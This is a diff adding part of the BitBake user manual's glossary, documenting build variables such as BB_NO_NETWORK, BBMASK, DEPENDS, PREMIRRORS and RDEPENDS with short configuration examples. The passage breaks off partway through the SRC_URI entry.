+      At this point in the execution of the code, the objective is to
+      quickly verify if a given setscene function is likely to work or not.
+      It's easier to check the list of setscene functions in one pass than
+      to call many individual tasks. The returned list need not be
+      completely accurate. A given setscene task can still later fail.
+      However, the more accurate the data returned, the more efficient the
+      build will be.
+
+   :term:`BB_INVALIDCONF`
+      Used in combination with the ``ConfigParsed`` event to trigger
+      re-parsing the base metadata (i.e. all the recipes). The
+      ``ConfigParsed`` event can set the variable to trigger the re-parse.
+      You must be careful to avoid recursive loops with this functionality.
+
+   :term:`BB_LOGCONFIG`
+      Specifies the name of a config file that contains the user logging
+      configuration. See
+      :ref:`bitbake-user-manual/bitbake-user-manual-execution:logging`
+      for additional information
+
+   :term:`BB_LOGFMT`
+      Specifies the name of the log files saved into
+      ``${``\ :term:`T`\ ``}``. By default, the ``BB_LOGFMT``
+      variable is undefined and the log file names get created using the
+      following form: ::
+
+         log.{task}.{pid}
+
+      If you want to force log files to take a specific name, you can set this
+      variable in a configuration file.
+
+   :term:`BB_NICE_LEVEL`
+      Allows BitBake to run at a specific priority (i.e. nice level).
+      System permissions usually mean that BitBake can reduce its priority
+      but not raise it again. See :term:`BB_TASK_NICE_LEVEL` for
+      additional information.
+
+   :term:`BB_NO_NETWORK`
+      Disables network access in the BitBake fetcher modules. With this
+      access disabled, any command that attempts to access the network
+      becomes an error.
+
+      Disabling network access is useful for testing source mirrors,
+      running builds when not connected to the Internet, and when operating
+      in certain kinds of firewall environments.
+
+   :term:`BB_NUMBER_THREADS`
+      The maximum number of tasks BitBake should run in parallel at any one
+      time. If your host development system supports multiple cores, a good
+      rule of thumb is to set this variable to twice the number of cores.
+
+   :term:`BB_NUMBER_PARSE_THREADS`
+      Sets the number of threads BitBake uses when parsing. By default, the
+      number of threads is equal to the number of cores on the system.
+
+   :term:`BB_ORIGENV`
+      Contains a copy of the original external environment in which BitBake
+      was run. The copy is taken before any whitelisted variable values are
+      filtered into BitBake's datastore.
+
+      .. note::
+
+         The contents of this variable is a datastore object that can be
+         queried using the normal datastore operations.
+
+   :term:`BB_PRESERVE_ENV`
+      Disables whitelisting and instead allows all variables through from
+      the external environment into BitBake's datastore.
+
+      .. note::
+
+         You must set this variable in the external environment in order
+         for it to work.
+
+   :term:`BB_RUNFMT`
+      Specifies the name of the executable script files (i.e. run files)
+      saved into ``${``\ :term:`T`\ ``}``. By default, the
+      ``BB_RUNFMT`` variable is undefined and the run file names get
+      created using the following form: ::
+
+         run.{task}.{pid}
+
+      If you want to force run files to take a specific name, you can set this
+      variable in a configuration file.
+
+   :term:`BB_RUNTASK`
+      Contains the name of the currently executing task. The value includes
+      the "do\_" prefix. For example, if the currently executing task is
+      ``do_config``, the value is "do_config".
+
+   :term:`BB_SCHEDULER`
+      Selects the name of the scheduler to use for the scheduling of
+      BitBake tasks. Three options exist:
+
+      -  *basic* - The basic framework from which everything derives. Using
+         this option causes tasks to be ordered numerically as they are
+         parsed.
+
+      -  *speed* - Executes tasks first that have more tasks depending on
+         them. The "speed" option is the default.
+
+      -  *completion* - Causes the scheduler to try to complete a given
+         recipe once its build has started.
+
+   :term:`BB_SCHEDULERS`
+      Defines custom schedulers to import. Custom schedulers need to be
+      derived from the ``RunQueueScheduler`` class.
+
+      For information how to select a scheduler, see the
+      :term:`BB_SCHEDULER` variable.
+
+   :term:`BB_SETSCENE_DEPVALID`
+      Specifies a function BitBake calls that determines whether BitBake
+      requires a setscene dependency to be met.
+
+      When running a setscene task, BitBake needs to know which
+      dependencies of that setscene task also need to be run. Whether
+      dependencies also need to be run is highly dependent on the metadata.
+      The function specified by this variable returns a "True" or "False"
+      depending on whether the dependency needs to be met.
+
+   :term:`BB_SETSCENE_VERIFY_FUNCTION2`
+      Specifies a function to call that verifies the list of planned task
+      execution before the main task execution happens. The function is
+      called once BitBake has a list of setscene tasks that have run and
+      either succeeded or failed.
+
+      The function allows for a task list check to see if they make sense.
+      Even if BitBake was planning to skip a task, the returned value of
+      the function can force BitBake to run the task, which is necessary
+      under certain metadata defined circumstances.
+
+   :term:`BB_SIGNATURE_EXCLUDE_FLAGS`
+      Lists variable flags (varflags) that can be safely excluded from
+      checksum and dependency data for keys in the datastore. When
+      generating checksum or dependency data for keys in the datastore, the
+      flags set against that key are normally included in the checksum.
+
+      For more information on varflags, see the
+      ":ref:`bitbake-user-manual/bitbake-user-manual-metadata:variable flags`"
+      section.
+
+   :term:`BB_SIGNATURE_HANDLER`
+      Defines the name of the signature handler BitBake uses. The signature
+      handler defines the way stamp files are created and handled, if and
+      how the signature is incorporated into the stamps, and how the
+      signature itself is generated.
+
+      A new signature handler can be added by injecting a class derived
+      from the ``SignatureGenerator`` class into the global namespace.
+
+   :term:`BB_SRCREV_POLICY`
+      Defines the behavior of the fetcher when it interacts with source
+      control systems and dynamic source revisions. The
+      ``BB_SRCREV_POLICY`` variable is useful when working without a
+      network.
+
+      The variable can be set using one of two policies:
+
+      -  *cache* - Retains the value the system obtained previously rather
+         than querying the source control system each time.
+
+      -  *clear* - Queries the source controls system every time. With this
+         policy, there is no cache. The "clear" policy is the default.
+
+   :term:`BB_STAMP_POLICY`
+      Defines the mode used for how timestamps of stamp files are compared.
+      You can set the variable to one of the following modes:
+
+      -  *perfile* - Timestamp comparisons are only made between timestamps
+         of a specific recipe. This is the default mode.
+
+      -  *full* - Timestamp comparisons are made for all dependencies.
+
+      -  *whitelist* - Identical to "full" mode except timestamp
+         comparisons are made for recipes listed in the
+         :term:`BB_STAMP_WHITELIST` variable.
+
+      .. note::
+
+         Stamp policies are largely obsolete with the introduction of
+         setscene tasks.
+
+   :term:`BB_STAMP_WHITELIST`
+      Lists files whose stamp file timestamps are compared when the stamp
+      policy mode is set to "whitelist". For information on stamp policies,
+      see the :term:`BB_STAMP_POLICY` variable.
+
+   :term:`BB_STRICT_CHECKSUM`
+      Sets a more strict checksum mechanism for non-local URLs. Setting
+      this variable to a value causes BitBake to report an error if it
+      encounters a non-local URL that does not have at least one checksum
+      specified.
+
+   :term:`BB_TASK_IONICE_LEVEL`
+      Allows adjustment of a task's Input/Output priority. During
+      Autobuilder testing, random failures can occur for tasks due to I/O
+      starvation. These failures occur during various QEMU runtime
+      timeouts. You can use the ``BB_TASK_IONICE_LEVEL`` variable to adjust
+      the I/O priority of these tasks.
+
+      .. note::
+
+         This variable works similarly to the :term:`BB_TASK_NICE_LEVEL`
+         variable except with a task's I/O priorities.
+
+      Set the variable as follows: ::
+
+         BB_TASK_IONICE_LEVEL = "class.prio"
+
+      For *class*, the default value is "2", which is a best effort. You can use
+      "1" for realtime and "3" for idle. If you want to use realtime, you
+      must have superuser privileges.
+
+      For *prio*, you can use any value from "0", which is the highest
+      priority, to "7", which is the lowest. The default value is "4". You
+      do not need any special privileges to use this range of priority
+      values.
+
+      .. note::
+
+         In order for your I/O priority settings to take effect, you need the
+         Completely Fair Queuing (CFQ) Scheduler selected for the backing block
+         device. To select the scheduler, use the following command form where
+         device is the device (e.g. sda, sdb, and so forth): ::
+
+            $ sudo sh -c "echo cfq > /sys/block/device/queu/scheduler"
+
+   :term:`BB_TASK_NICE_LEVEL`
+      Allows specific tasks to change their priority (i.e. nice level).
+
+      You can use this variable in combination with task overrides to raise
+      or lower priorities of specific tasks. For example, on the `Yocto
+      Project <http://www.yoctoproject.org>`__ autobuilder, QEMU emulation
+      in images is given a higher priority as compared to build tasks to
+      ensure that images do not suffer timeouts on loaded systems.
+
+   :term:`BB_TASKHASH`
+      Within an executing task, this variable holds the hash of the task as
+      returned by the currently enabled signature generator.
+
+   :term:`BB_VERBOSE_LOGS`
+      Controls how verbose BitBake is during builds. If set, shell scripts
+      echo commands and shell script output appears on standard out
+      (stdout).
+
+   :term:`BB_WORKERCONTEXT`
+      Specifies if the current context is executing a task. BitBake sets
+      this variable to "1" when a task is being executed. The value is not
+      set when the task is in server context during parsing or event
+      handling.
+
+   :term:`BBCLASSEXTEND`
+      Allows you to extend a recipe so that it builds variants of the
+      software. Some examples of these variants for recipes from the
+      OpenEmbedded-Core metadata are "natives" such as ``quilt-native``,
+      which is a copy of Quilt built to run on the build system; "crosses"
+      such as ``gcc-cross``, which is a compiler built to run on the build
+      machine but produces binaries that run on the target ``MACHINE``;
+      "nativesdk", which targets the SDK machine instead of ``MACHINE``;
+      and "mulitlibs" in the form "``multilib:``\ multilib_name".
+
+      To build a different variant of the recipe with a minimal amount of
+      code, it usually is as simple as adding the variable to your recipe.
+      Here are two examples. The "native" variants are from the
+      OpenEmbedded-Core metadata: ::
+
+         BBCLASSEXTEND =+ "native nativesdk"
+         BBCLASSEXTEND =+ "multilib:multilib_name"
+
+      .. note::
+
+         Internally, the ``BBCLASSEXTEND`` mechanism generates recipe
+         variants by rewriting variable values and applying overrides such
+         as ``_class-native``. For example, to generate a native version of
+         a recipe, a :term:`DEPENDS` on "foo" is
+         rewritten to a ``DEPENDS`` on "foo-native".
+
+         Even when using ``BBCLASSEXTEND``, the recipe is only parsed once.
+         Parsing once adds some limitations. For example, it is not
+         possible to include a different file depending on the variant,
+         since ``include`` statements are processed when the recipe is
+         parsed.
+
+   :term:`BBDEBUG`
+      Sets the BitBake debug output level to a specific value as
+      incremented by the ``-D`` command line option.
+
+      .. note::
+
+         You must set this variable in the external environment in order
+         for it to work.
+
+   :term:`BBFILE_COLLECTIONS`
+      Lists the names of configured layers. These names are used to find
+      the other ``BBFILE_*`` variables. Typically, each layer appends its
+      name to this variable in its ``conf/layer.conf`` file.
+
+   :term:`BBFILE_PATTERN`
+      Variable that expands to match files from
+      :term:`BBFILES` in a particular layer. This
+      variable is used in the ``conf/layer.conf`` file and must be suffixed
+      with the name of the specific layer (e.g.
+      ``BBFILE_PATTERN_emenlow``).
+
+   :term:`BBFILE_PRIORITY`
+      Assigns the priority for recipe files in each layer.
+
+      This variable is useful in situations where the same recipe appears
+      in more than one layer. Setting this variable allows you to
+      prioritize a layer against other layers that contain the same recipe
+      - effectively letting you control the precedence for the multiple
+      layers. The precedence established through this variable stands
+      regardless of a recipe's version (:term:`PV` variable).
+      For example, a layer that has a recipe with a higher ``PV`` value but
+      for which the ``BBFILE_PRIORITY`` is set to have a lower precedence
+      still has a lower precedence.
+
+      A larger value for the ``BBFILE_PRIORITY`` variable results in a
+      higher precedence. For example, the value 6 has a higher precedence
+      than the value 5. If not specified, the ``BBFILE_PRIORITY`` variable
+      is set based on layer dependencies (see the ``LAYERDEPENDS`` variable
+      for more information. The default priority, if unspecified for a
+      layer with no dependencies, is the lowest defined priority + 1 (or 1
+      if no priorities are defined).
+
+      .. tip::
+
+         You can use the command bitbake-layers show-layers to list all
+         configured layers along with their priorities.
+
+   :term:`BBFILES`
+      A space-separated list of recipe files BitBake uses to build
+      software.
+
+      When specifying recipe files, you can pattern match using Python's
+      `glob <https://docs.python.org/3/library/glob.html>`_ syntax.
+      For details on the syntax, see the documentation by following the
+      previous link.
+
+   :term:`BBINCLUDED`
+      Contains a space-separated list of all of all files that BitBake's
+      parser included during parsing of the current file.
+
+   :term:`BBINCLUDELOGS`
+      If set to a value, enables printing the task log when reporting a
+      failed task.
+
+   :term:`BBINCLUDELOGS_LINES`
+      If :term:`BBINCLUDELOGS` is set, specifies
+      the maximum number of lines from the task log file to print when
+      reporting a failed task. If you do not set ``BBINCLUDELOGS_LINES``,
+      the entire log is printed.
+
+   :term:`BBLAYERS`
+      Lists the layers to enable during the build. This variable is defined
+      in the ``bblayers.conf`` configuration file in the build directory.
+      Here is an example: ::
+
+         BBLAYERS = " \
+             /home/scottrif/poky/meta \
+             /home/scottrif/poky/meta-yocto \
+             /home/scottrif/poky/meta-yocto-bsp \
+             /home/scottrif/poky/meta-mykernel \
+         "
+
+      This example enables four layers, one of which is a custom, user-defined
+      layer named ``meta-mykernel``.
+
+   :term:`BBLAYERS_FETCH_DIR`
+      Sets the base location where layers are stored. This setting is used
+      in conjunction with ``bitbake-layers layerindex-fetch`` and tells
+      ``bitbake-layers`` where to place the fetched layers.
+
+   :term:`BBMASK`
+      Prevents BitBake from processing recipes and recipe append files.
+
+      You can use the ``BBMASK`` variable to "hide" these ``.bb`` and
+      ``.bbappend`` files. BitBake ignores any recipe or recipe append
+      files that match any of the expressions. It is as if BitBake does not
+      see them at all. Consequently, matching files are not parsed or
+      otherwise used by BitBake.
+
+      The values you provide are passed to Python's regular expression
+      compiler. Consequently, the syntax follows Python's Regular
+      Expression (re) syntax. The expressions are compared against the full
+      paths to the files. For complete syntax information, see Python's
+      documentation at http://docs.python.org/3/library/re.html.
+
+      The following example uses a complete regular expression to tell
+      BitBake to ignore all recipe and recipe append files in the
+      ``meta-ti/recipes-misc/`` directory: ::
+
+         BBMASK = "meta-ti/recipes-misc/"
+
+      If you want to mask out multiple directories or recipes, you can
+      specify multiple regular expression fragments. This next example
+      masks out multiple directories and individual recipes: ::
+
+         BBMASK += "/meta-ti/recipes-misc/ meta-ti/recipes-ti/packagegroup/"
+         BBMASK += "/meta-oe/recipes-support/"
+         BBMASK += "/meta-foo/.*/openldap"
+         BBMASK += "opencv.*\.bbappend"
+         BBMASK += "lzma"
+
+      .. note::
+
+         When specifying a directory name, use the trailing slash character
+         to ensure you match just that directory name.
+
+   :term:`BBMULTICONFIG`
+      Enables BitBake to perform multiple configuration builds and lists
+      each separate configuration (multiconfig). You can use this variable
+      to cause BitBake to build multiple targets where each target has a
+      separate configuration. Define ``BBMULTICONFIG`` in your
+      ``conf/local.conf`` configuration file.
+
+      As an example, the following line specifies three multiconfigs, each
+      having a separate configuration file: ::
+
+         BBMULTIFONFIG = "configA configB configC"
+
+      Each configuration file you use must reside in the
+      build directory within a directory named ``conf/multiconfig`` (e.g.
+      build_directory\ ``/conf/multiconfig/configA.conf``).
+
+      For information on how to use ``BBMULTICONFIG`` in an environment
+      that supports building targets with multiple configurations, see the
+      ":ref:`bitbake-user-manual/bitbake-user-manual-intro:executing a multiple configuration build`"
+      section.
+
+   :term:`BBPATH`
+      Used by BitBake to locate class (``.bbclass``) and configuration
+      (``.conf``) files. This variable is analogous to the ``PATH``
+      variable.
+
+      If you run BitBake from a directory outside of the build directory,
+      you must be sure to set ``BBPATH`` to point to the build directory.
+      Set the variable as you would any environment variable and then run
+      BitBake: ::
+
+         $ BBPATH="build_directory"
+         $ export BBPATH
+         $ bitbake target
+
+   :term:`BBSERVER`
+      Points to the server that runs memory-resident BitBake. The variable
+      is only used when you employ memory-resident BitBake.
+
+   :term:`BBTARGETS`
+      Allows you to use a configuration file to add to the list of
+      command-line target recipes you want to build.
+
+   :term:`BBVERSIONS`
+      Allows a single recipe to build multiple versions of a project from a
+      single recipe file. You also able to specify conditional metadata
+      using the :term:`OVERRIDES` mechanism for a
+      single version or for an optionally named range of versions.
+
+      For more information on ``BBVERSIONS``, see the
+      ":ref:`bitbake-user-manual/bitbake-user-manual-metadata:variants - class extension mechanism`"
+      section.
+
+   :term:`BITBAKE_UI`
+      Used to specify the UI module to use when running BitBake. Using this
+      variable is equivalent to using the ``-u`` command-line option.
+
+      .. note::
+
+         You must set this variable in the external environment in order
+         for it to work.
+
+   :term:`BUILDNAME`
+      A name assigned to the build. The name defaults to a datetime stamp
+      of when the build was started but can be defined by the metadata.
+
+   :term:`BZRDIR`
+      The directory in which files checked out of a Bazaar system are
+      stored.
+
+   :term:`CACHE`
+      Specifies the directory BitBake uses to store a cache of the metadata
+      so it does not need to be parsed every time BitBake is started.
+
+   :term:`CVSDIR`
+      The directory in which files checked out under the CVS system are
+      stored.
+
+   :term:`DEFAULT_PREFERENCE`
+      Specifies a weak bias for recipe selection priority.
+
+      The most common usage of this is variable is to set it to "-1" within
+      a recipe for a development version of a piece of software. Using the
+      variable in this way causes the stable version of the recipe to build
+      by default in the absence of ``PREFERRED_VERSION`` being used to
+      build the development version.
+
+      .. note::
+
+         The bias provided by DEFAULT_PREFERENCE is weak and is overridden by
+         :term:`BBFILE_PRIORITY` if that variable is different between two
+         layers that contain different versions of the same recipe.
+
+   :term:`DEPENDS`
+      Lists a recipe's build-time dependencies (i.e. other recipe files).
+
+      Consider this simple example for two recipes named "a" and "b" that
+      produce similarly named packages. In this example, the ``DEPENDS``
+      statement appears in the "a" recipe: ::
+
+         DEPENDS = "b"
+
+      Here, the dependency is such that the ``do_configure`` task for recipe "a"
+      depends on the ``do_populate_sysroot`` task of recipe "b". This means
+      anything that recipe "b" puts into sysroot is available when recipe "a" is
+      configuring itself.
+
+      For information on runtime dependencies, see the :term:`RDEPENDS`
+      variable.
+
+   :term:`DESCRIPTION`
+      A long description for the recipe.
+
+   :term:`DL_DIR`
+      The central download directory used by the build process to store
+      downloads. By default, ``DL_DIR`` gets files suitable for mirroring for
+      everything except Git repositories. If you want tarballs of Git
+      repositories, use the :term:`BB_GENERATE_MIRROR_TARBALLS` variable.
+
+   :term:`EXCLUDE_FROM_WORLD`
+      Directs BitBake to exclude a recipe from world builds (i.e.
+      ``bitbake world``). During world builds, BitBake locates, parses and
+      builds all recipes found in every layer exposed in the
+      ``bblayers.conf`` configuration file.
+
+      To exclude a recipe from a world build using this variable, set the
+      variable to "1" in the recipe.
+
+      .. note::
+
+         Recipes added to ``EXCLUDE_FROM_WORLD`` may still be built during a world
+         build in order to satisfy dependencies of other recipes. Adding a
+         recipe to ``EXCLUDE_FROM_WORLD`` only ensures that the recipe is not
+         explicitly added to the list of build targets in a world build.
+
+   :term:`FAKEROOT`
+      Contains the command to use when running a shell script in a fakeroot
+      environment. The ``FAKEROOT`` variable is obsolete and has been
+      replaced by the other ``FAKEROOT*`` variables. See these entries in
+      the glossary for more information.
+
+   :term:`FAKEROOTBASEENV`
+      Lists environment variables to set when executing the command defined
+      by :term:`FAKEROOTCMD` that starts the
+      bitbake-worker process in the fakeroot environment.
+
+   :term:`FAKEROOTCMD`
+      Contains the command that starts the bitbake-worker process in the
+      fakeroot environment.
+
+   :term:`FAKEROOTDIRS`
+      Lists directories to create before running a task in the fakeroot
+      environment.
+
+   :term:`FAKEROOTENV`
+      Lists environment variables to set when running a task in the
+      fakeroot environment. For additional information on environment
+      variables and the fakeroot environment, see the
+      :term:`FAKEROOTBASEENV` variable.
+
+   :term:`FAKEROOTNOENV`
+      Lists environment variables to set when running a task that is not in
+      the fakeroot environment. For additional information on environment
+      variables and the fakeroot environment, see the
+      :term:`FAKEROOTENV` variable.
+
+   :term:`FETCHCMD`
+      Defines the command the BitBake fetcher module executes when running
+      fetch operations. You need to use an override suffix when you use the
+      variable (e.g. ``FETCHCMD_git`` or ``FETCHCMD_svn``).
+
+   :term:`FILE`
+      Points at the current file. BitBake sets this variable during the
+      parsing process to identify the file being parsed. BitBake also sets
+      this variable when a recipe is being executed to identify the recipe
+      file.
+
+   :term:`FILESPATH`
+      Specifies directories BitBake uses when searching for patches and
+      files. The "local" fetcher module uses these directories when
+      handling ``file://`` URLs. The variable behaves like a shell ``PATH``
+      environment variable. The value is a colon-separated list of
+      directories that are searched left-to-right in order.
+
+   :term:`GITDIR`
+      The directory in which a local copy of a Git repository is stored
+      when it is cloned.
+
+   :term:`HGDIR`
+      The directory in which files checked out of a Mercurial system are
+      stored.
+
+   :term:`HOMEPAGE`
+      Website where more information about the software the recipe is
+      building can be found.
+
+   :term:`INHERIT`
+      Causes the named class or classes to be inherited globally. Anonymous
+      functions in the class or classes are not executed for the base
+      configuration and in each individual recipe. The OpenEmbedded build
+      system ignores changes to ``INHERIT`` in individual recipes.
+
+      For more information on ``INHERIT``, see the
+      ":ref:`bitbake-user-manual/bitbake-user-manual-metadata:\`\`inherit\`\` configuration directive`"
+      section.
+
+   :term:`LAYERDEPENDS`
+      Lists the layers, separated by spaces, upon which this recipe
+      depends. Optionally, you can specify a specific layer version for a
+      dependency by adding it to the end of the layer name with a colon,
+      (e.g. "anotherlayer:3" to be compared against
+      :term:`LAYERVERSION`\ ``_anotherlayer`` in
+      this case). BitBake produces an error if any dependency is missing or
+      the version numbers do not match exactly (if specified).
+
+      You use this variable in the ``conf/layer.conf`` file. You must also
+      use the specific layer name as a suffix to the variable (e.g.
+      ``LAYERDEPENDS_mylayer``).
+
+   :term:`LAYERDIR`
+      When used inside the ``layer.conf`` configuration file, this variable
+      provides the path of the current layer. This variable is not
+      available outside of ``layer.conf`` and references are expanded
+      immediately when parsing of the file completes.
+
+   :term:`LAYERDIR_RE`
+      When used inside the ``layer.conf`` configuration file, this variable
+      provides the path of the current layer, escaped for use in a regular
+      expression (:term:`BBFILE_PATTERN`). This
+      variable is not available outside of ``layer.conf`` and references
+      are expanded immediately when parsing of the file completes.
+
+   :term:`LAYERVERSION`
+      Optionally specifies the version of a layer as a single number. You
+      can use this variable within
+      :term:`LAYERDEPENDS` for another layer in
+      order to depend on a specific version of the layer.
+
+      You use this variable in the ``conf/layer.conf`` file. You must also
+      use the specific layer name as a suffix to the variable (e.g.
+      ``LAYERDEPENDS_mylayer``).
+
+   :term:`LICENSE`
+      The list of source licenses for the recipe.
+
+   :term:`MIRRORS`
+      Specifies additional paths from which BitBake gets source code. When
+      the build system searches for source code, it first tries the local
+      download directory. If that location fails, the build system tries
+      locations defined by :term:`PREMIRRORS`, the
+      upstream source, and then locations specified by ``MIRRORS`` in that
+      order.
+
+   :term:`MULTI_PROVIDER_WHITELIST`
+      Allows you to suppress BitBake warnings caused when building two
+      separate recipes that provide the same output.
+
+      BitBake normally issues a warning when building two different recipes
+      where each provides the same output. This scenario is usually
+      something the user does not want. However, cases do exist where it
+      makes sense, particularly in the ``virtual/*`` namespace. You can use
+      this variable to suppress BitBake's warnings.
+
+      To use the variable, list provider names (e.g. recipe names,
+      ``virtual/kernel``, and so forth).
+
+   :term:`OVERRIDES`
+      BitBake uses ``OVERRIDES`` to control what variables are overridden
+      after BitBake parses recipes and configuration files.
+
+      Following is a simple example that uses an overrides list based on
+      machine architectures: OVERRIDES = "arm:x86:mips:powerpc" You can
+      find information on how to use ``OVERRIDES`` in the
+      ":ref:`bitbake-user-manual/bitbake-user-manual-metadata:conditional syntax
+      (overrides)`" section.
+
+   :term:`P4DIR`
+      The directory in which a local copy of a Perforce depot is stored
+      when it is fetched.
+
+   :term:`PACKAGES`
+      The list of packages the recipe creates.
+
+   :term:`PACKAGES_DYNAMIC`
+      A promise that your recipe satisfies runtime dependencies for
+      optional modules that are found in other recipes.
+      ``PACKAGES_DYNAMIC`` does not actually satisfy the dependencies, it
+      only states that they should be satisfied. For example, if a hard,
+      runtime dependency (:term:`RDEPENDS`) of another
+      package is satisfied during the build through the
+      ``PACKAGES_DYNAMIC`` variable, but a package with the module name is
+      never actually produced, then the other package will be broken.
+
+   :term:`PE`
+      The epoch of the recipe. By default, this variable is unset. The
+      variable is used to make upgrades possible when the versioning scheme
+      changes in some backwards incompatible way.
+
+   :term:`PERSISTENT_DIR`
+      Specifies the directory BitBake uses to store data that should be
+      preserved between builds. In particular, the data stored is the data
+      that uses BitBake's persistent data API and the data used by the PR
+      Server and PR Service.
+
+   :term:`PF`
+      Specifies the recipe or package name and includes all version and
+      revision numbers (i.e. ``eglibc-2.13-r20+svnr15508/`` and
+      ``bash-4.2-r1/``).
+
+   :term:`PN`
+      The recipe name.
+
+   :term:`PR`
+      The revision of the recipe.
+
+   :term:`PREFERRED_PROVIDER`
+      Determines which recipe should be given preference when multiple
+      recipes provide the same item. You should always suffix the variable
+      with the name of the provided item, and you should set it to the
+      :term:`PN` of the recipe to which you want to give
+      precedence. Some examples: ::
+
+         PREFERRED_PROVIDER_virtual/kernel ?= "linux-yocto"
+         PREFERRED_PROVIDER_virtual/xserver = "xserver-xf86"
+         PREFERRED_PROVIDER_virtual/libgl ?= "mesa"
+
+   :term:`PREFERRED_PROVIDERS`
+      Determines which recipe should be given preference for cases where
+      multiple recipes provide the same item. Functionally,
+      ``PREFERRED_PROVIDERS`` is identical to
+      :term:`PREFERRED_PROVIDER`. However, the ``PREFERRED_PROVIDERS`` variable
+      lets you define preferences for multiple situations using the following
+      form: ::
+
+         PREFERRED_PROVIDERS = "xxx:yyy aaa:bbb ..."
+
+      This form is a convenient replacement for the following: ::
+
+         PREFERRED_PROVIDER_xxx = "yyy"
+         PREFERRED_PROVIDER_aaa = "bbb"
+
+   :term:`PREFERRED_VERSION`
+      If there are multiple versions of recipes available, this variable
+      determines which recipe should be given preference. You must always
+      suffix the variable with the :term:`PN` you want to
+      select, and you should set :term:`PV` accordingly for
+      precedence.
+
+      The ``PREFERRED_VERSION`` variable supports limited wildcard use
+      through the "``%``" character. You can use the character to match any
+      number of characters, which can be useful when specifying versions
+      that contain long revision numbers that potentially change. Here are
+      two examples: ::
+
+         PREFERRED_VERSION_python = "2.7.3"
+         PREFERRED_VERSION_linux-yocto = "4.12%"
+
+      .. important::
+
+         The use of the " % " character is limited in that it only works at the
+         end of the string. You cannot use the wildcard character in any other
+         location of the string.
+
+   :term:`PREMIRRORS`
+      Specifies additional paths from which BitBake gets source code. When
+      the build system searches for source code, it first tries the local
+      download directory. If that location fails, the build system tries
+      locations defined by ``PREMIRRORS``, the upstream source, and then
+      locations specified by :term:`MIRRORS` in that order.
+
+      Typically, you would add a specific server for the build system to
+      attempt before any others by adding something like the following to
+      your configuration: ::
+
+         PREMIRRORS_prepend = "\
+         git://.*/.* http://www.yoctoproject.org/sources/ \n \
+         ftp://.*/.* http://www.yoctoproject.org/sources/ \n \
+         http://.*/.* http://www.yoctoproject.org/sources/ \n \
+         https://.*/.* http://www.yoctoproject.org/sources/ \n"
+
+      These changes cause the build system to intercept Git, FTP, HTTP, and
+      HTTPS requests and direct them to the ``http://`` sources mirror. You can
+      use ``file://`` URLs to point to local directories or network shares as
+      well.
+
+   :term:`PROVIDES`
+      A list of aliases by which a particular recipe can be known. By
+      default, a recipe's own ``PN`` is implicitly already in its
+      ``PROVIDES`` list. If a recipe uses ``PROVIDES``, the additional
+      aliases are synonyms for the recipe and can be useful satisfying
+      dependencies of other recipes during the build as specified by
+      ``DEPENDS``.
+
+      Consider the following example ``PROVIDES`` statement from a recipe
+      file ``libav_0.8.11.bb``: ::
+
+         PROVIDES += "libpostproc"
+
+      The ``PROVIDES`` statement results in the "libav" recipe also being known
+      as "libpostproc".
+
+      In addition to providing recipes under alternate names, the
+      ``PROVIDES`` mechanism is also used to implement virtual targets. A
+      virtual target is a name that corresponds to some particular
+      functionality (e.g. a Linux kernel). Recipes that provide the
+      functionality in question list the virtual target in ``PROVIDES``.
+      Recipes that depend on the functionality in question can include the
+      virtual target in :term:`DEPENDS` to leave the
+      choice of provider open.
+
+      Conventionally, virtual targets have names on the form
+      "virtual/function" (e.g. "virtual/kernel"). The slash is simply part
+      of the name and has no syntactical significance.
+
+   :term:`PRSERV_HOST`
+      The network based :term:`PR` service host and port.
+
+      Following is an example of how the ``PRSERV_HOST`` variable is set: ::
+
+         PRSERV_HOST = "localhost:0"
+
+      You must set the variable if you want to automatically start a local PR
+      service. You can set ``PRSERV_HOST`` to other values to use a remote PR
+      service.
+
+   :term:`PV`
+      The version of the recipe.
+
+   :term:`RDEPENDS`
+      Lists a package's runtime dependencies (i.e. other packages) that
+      must be installed in order for the built package to run correctly. If
+      a package in this list cannot be found during the build, you will get
+      a build error.
+
+      Because the ``RDEPENDS`` variable applies to packages being built,
+      you should always use the variable in a form with an attached package
+      name. For example, suppose you are building a development package
+      that depends on the ``perl`` package. In this case, you would use the
+      following ``RDEPENDS`` statement: ::
+
+         RDEPENDS_${PN}-dev += "perl"
+
+      In the example, the development package depends on the ``perl`` package.
+      Thus, the ``RDEPENDS`` variable has the ``${PN}-dev`` package name as part
+      of the variable.
+
+      BitBake supports specifying versioned dependencies. Although the
+      syntax varies depending on the packaging format, BitBake hides these
+      differences from you. Here is the general syntax to specify versions
+      with the ``RDEPENDS`` variable: ::
+
+         RDEPENDS_${PN} = "package (operator version)"
+
+      For ``operator``, you can specify the following: ::
+
+         =
+         <
+         >
+         <=
+         >=
+
+      For example, the following sets up a dependency on version 1.2 or
+      greater of the package ``foo``: ::
+
+         RDEPENDS_${PN} = "foo (>= 1.2)"
+
+      For information on build-time dependencies, see the :term:`DEPENDS`
+      variable.
+
+   :term:`REPODIR`
+      The directory in which a local copy of a ``google-repo`` directory is
+      stored when it is synced.
+
+   :term:`RPROVIDES`
+      A list of package name aliases that a package also provides. These
+      aliases are useful for satisfying runtime dependencies of other
+      packages both during the build and on the target (as specified by
+      ``RDEPENDS``).
+
+      As with all package-controlling variables, you must always use the
+      variable in conjunction with a package name override. Here is an
+      example: ::
+
+         RPROVIDES_${PN} = "widget-abi-2"
+
+   :term:`RRECOMMENDS`
+      A list of packages that extends the usability of a package being
+      built. The package being built does not depend on this list of
+      packages in order to successfully build, but needs them for the
+      extended usability. To specify runtime dependencies for packages, see
+      the ``RDEPENDS`` variable.
+
+      BitBake supports specifying versioned recommends. Although the syntax
+      varies depending on the packaging format, BitBake hides these
+      differences from you. Here is the general syntax to specify versions
+      with the ``RRECOMMENDS`` variable: ::
+
+         RRECOMMENDS_${PN} = "package (operator version)"
+
+      For ``operator``, you can specify the following: ::
+
+         =
+         <
+         >
+         <=
+         >=
+
+      For example, the following sets up a recommend on version
+      1.2 or greater of the package ``foo``: ::
+
+         RRECOMMENDS_${PN} = "foo (>= 1.2)"
+
+   :term:`SECTION`
+      The section in which packages should be categorized.
+
+   :term:`SRC_URI`
+      The list of source files - local or remote. This variable tells
+      BitBake which bits to pull for the build and how to pull them. For
+      example, if the recipe or append file needs to fetch a single tarball
+      from the Internet, the recipe or append file uses a ``SRC_URI`` entry
+      that specifies that tarball. On the other hand, if the recipe or
+      append file needs to fetch a tarball and include a custom file, the
+      recipe or append file needs an ``SRC_URI`` variable that specifies
+      all those sources.
+
+      The following list explains the available URI protocols:
+
+      -  ``file://`` : Fetches files, which are usually files shipped
+         with the metadata, from the local machine. The path is relative to
